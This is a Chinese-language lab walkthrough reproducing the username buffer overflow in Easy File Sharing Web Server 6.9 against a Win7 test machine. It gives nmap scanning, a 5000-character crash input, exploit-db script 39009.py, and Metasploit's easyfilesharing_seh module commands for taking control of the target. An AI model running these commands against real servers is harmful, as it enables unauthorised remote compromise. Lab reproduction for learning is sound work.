目录
输入命令,寻找找到EasyFileSharing漏洞的利用模块
漏洞介绍
由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进而导致服务器被黑客控制。
环境准备
攻击机:Kali-Linux-2021.2-vmware-amd64 192.168.xxx.xxx
靶机:Win7 旗舰版 192.168.xxx.xxx
服务程序:Easy File Sharing Web Server 2018
服务端口: 80
复现过程
一、环境搭建
①在win7旗舰虚拟机上安装Easy File Sharing Web Server 2018,照安装向导一路默认就行了
安装好后对跳出来这个,我们点击try it(试用)就行了
打开我我们看到http协议开在80端口(这个很很关键,因为我们要用到的就是目标靶机80端口的http服务版本是 Easy File Sharing Web Server httpd 6.9 ,这个版本存在缓冲区溢出漏洞)
②先打开kali窗口我们对靶机用nmap命令扫描一下80端口情况
nmap -p 80 192.168.40.130 -sV
80端口是打开的,发现目标靶机80端口的http服务版本是 Easy File Sharing Web Server httpd 6.9 ,这个版本存在缓冲区溢出漏洞
二、漏洞利用
①kali虚拟机打开浏览器,输入
192.168.40.130:80 (注意英文符号以及无空格)
进入到Easy File Sharing Web Server的登入页
当我们在Username中输入过长的用户名时,该服务程序会发生缓冲区溢出
所以我先用python生成5000个a字符,然后复制粘贴填入,发现网页许久无反应
查看靶机,发现Easy File Sharing Web Server已被漏洞瘫痪
利用漏洞
在kali自带的漏洞利用脚本库中寻找easy file sharing的漏洞利用脚本
searchsploit easy file sharing
选择利用39009.py文件脚本,使用
python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.40.130(靶机ip) 80
查看靶机,查看目标靶机,发现目标靶机已经弹计算器并且程序崩溃了
利用metasploit进行漏洞利用
在kali打开msf控制台
输入命令,寻找找到EasyFileSharing漏洞的利用模块
search EasyFileSharing
使用红圈这个
输入命令
use exploit/windows/http/easyfilesharing_seh
进行ip配置,先打开配置查看配置选项,然后再配置靶机ip,命令如下
show options
set RHOSTS 192.168.40.130
配置成功,然后我们进行下一步,输入命令执行攻击模块
exploit
攻击执行成功就可以对靶机执行控制了
小结
电脑一定要安装安全软件和杀毒软件,保障我们电脑的安全